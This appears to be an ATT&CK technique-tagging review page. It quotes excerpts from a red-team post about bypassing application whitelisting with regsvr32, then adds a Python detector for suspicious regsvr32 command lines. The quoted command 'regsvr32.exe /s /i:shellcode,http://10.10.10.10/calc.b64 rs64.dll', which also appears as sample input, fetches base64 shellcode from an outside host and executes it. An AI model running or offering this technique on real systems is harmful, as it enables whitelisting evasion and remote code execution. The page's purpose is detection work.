“How to Evade Application Whitelisting Using REGSVR32. Joff Thyer // I was recently working on a Red Team for a customer that was very much up to date with their defenses. This customer had tight egress controls, perimeter proxy…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
T1218.010 Regsvr32 (92%)
“…DLL registration method is that whatever DLL you create only has to export four different methods in order to work. These are: EntryPoint(), DllRegisterServer(), DllUnregisterServer(), DllInstall(). As Casey points out in various blog entries, this affords you with…”
T1059.001 PowerShell (72%)
“…from the fancy DLL directly. C:\> regsvr32.exe /s /i:shellcode,http://10.10.10.10/calc.b64 rs64.dll Now we can do the same thing, only this time using PowerShell instead. Generate your favorite PowerShell base64 encoded payload. Let me guess, you probably want…”
T1574.001 DLL (70%)
“…loit case, the DLL entry point is named “Control_RunDLL”. While this might evade whitelisting, we also knew this old trick had been played before and we likely could not count on it again. One interesting technique published by Casey Smith involves the DLL registration proc…”
T1059.001 PowerShell (57%)
“…pass in a comma followed by either a filename or URL pointing to data that is base64 encoded. The base64 encoded data is either binary shellcode or a PowerShell script. - Read the file or URL contents, then base64 decode. - If the content is PowerShell, create a runspace pipeline…”
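The regsvr32 command quoted earlier on this page (/s /i:shellcode,http://10.10.10.10/calc.b64 rs64.dll) and the /i: argument convention described in the excerpt above (a tag, then a comma, then a filename or URL holding base64 data) are enough to write the defender-side check a reviewer of this tag would want. The following is an added example, not code from Joff Thyer's post or from Black Hills Information Security: a Python parser for Windows process-creation command lines that extracts regsvr32 switches, splits the /i: string the same way the post's DllInstall does, and flags a remote URL as the data source. The sample command lines are constructed; only the second mirrors the command quoted from the post, and the finding labels are names chosen here, not any product's taxonomy.

```python
"""Flag regsvr32 invocations that hand DllInstall a remote payload source.

Added example (not code from the post or from Black Hills Information Security).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed command lines for the demo; not real telemetry. Only the second
# mirrors the command quoted from the post.
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
    r'regsvr32.exe /s /i:shellcode,http://10.10.10.10/calc.b64 rs64.dll',
    r'"C:\Windows\SysWOW64\regsvr32.exe" /u /s "C:\Program Files (x86)\App\legacy.dll"',
    r'regsvr32.exe /s /i:powershell,C:\Users\Public\payload.b64 C:\Users\Public\rs64.dll',
    r'C:\Windows\System32\svchost.exe -k netsvcs',
]

REMOTE_SCHEMES = {'http', 'https', 'ftp'}


@dataclass
class Regsvr32Invocation:
    image: str                                  # argv[0] as logged
    silent: bool = False                        # /s: suppress dialog boxes
    uninstall: bool = False                     # /u: call DllUnregisterServer
    no_register: bool = False                   # /n: skip DllRegisterServer (used with /i)
    install_arg: Optional[str] = None           # text after /i: (handed to DllInstall)
    dll: Optional[str] = None                   # positional argument: the DLL to load
    other_switches: List[str] = field(default_factory=list)


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_regsvr32(cmdline: str) -> Optional[Regsvr32Invocation]:
    """Return the parsed invocation, or None if the image is not regsvr32."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image_name = tokens[0].replace('/', '\\').rsplit('\\', 1)[-1].lower()
    if image_name not in ('regsvr32', 'regsvr32.exe'):
        return None
    inv = Regsvr32Invocation(image=tokens[0])
    for tok in tokens[1:]:
        low = tok.lower()
        if low in ('/s', '-s'):
            inv.silent = True
        elif low in ('/u', '-u'):
            inv.uninstall = True
        elif low in ('/n', '-n'):
            inv.no_register = True
        elif low.startswith(('/i:', '-i:')):
            inv.install_arg = tok[3:]
        elif low in ('/i', '-i'):
            inv.install_arg = ''            # bare /i still routes through DllInstall
        elif low.startswith(('/', '-')):
            inv.other_switches.append(tok)
        else:
            inv.dll = tok
    return inv


def split_install_arg(install_arg: str) -> Tuple[Optional[str], str, bool]:
    """Split the /i: string the way the post's DLL does: an optional tag before the
    first comma ("shellcode" or "powershell"), then the filename or URL that holds
    the base64 data. Returns (tag, source, source_is_remote)."""
    tag, comma, source = install_arg.partition(',')
    if not comma:
        tag, source = None, install_arg
    scheme = urlparse(source).scheme.lower()   # a drive letter parses as scheme 'c', not a URL
    return tag, source, scheme in REMOTE_SCHEMES


def assess(cmdline: str) -> List[str]:
    """Return finding labels for one command line; an empty list means nothing notable."""
    inv = parse_regsvr32(cmdline)
    if inv is None:
        return []
    findings: List[str] = []
    if inv.install_arg is not None:
        findings.append('dllinstall_invoked')
        tag, _source, remote = split_install_arg(inv.install_arg)
        if remote:
            findings.append('install_arg_remote_url')   # the post's /i:shellcode,http://... shape
        if tag:
            findings.append(f'install_arg_tag:{tag.lower()}')
    if inv.dll and '\\' not in inv.dll and '/' not in inv.dll:
        findings.append('dll_relative_path')           # e.g. rs64.dll resolved from the CWD
    return findings


def scan(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run assess() over many command lines and keep only those with findings."""
    results = [(c, assess(c)) for c in cmdlines]
    return [(c, f) for c, f in results if f]


if __name__ == '__main__':
    for cmdline, findings in scan(SAMPLE_CMDLINES):
        print(findings, '<-', cmdline)
```

Feed it the CommandLine field from Sysmon Event ID 1 or from Windows 4688 events with command-line auditing enabled; without command-line logging the /i: string is not visible and this check has nothing to work on. A local file after /i: is normal for some installers, so install_arg_remote_url is the high-signal finding here, and the relative-DLL-path label is only a weak supporting indicator.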
T1218.010 Regsvr32 (51%)
“…loit case, the DLL entry point is named “Control_RunDLL”. While this might evade whitelisting, we also knew this old trick had been played before and we likely could not count on it again. One interesting technique published by Casey Smith involves the DLL registration proc…”
Summary
Joff Thyer // I was recently working on a Red Team for a customer that was very much up to date with their defenses. This customer had tight egress controls, […]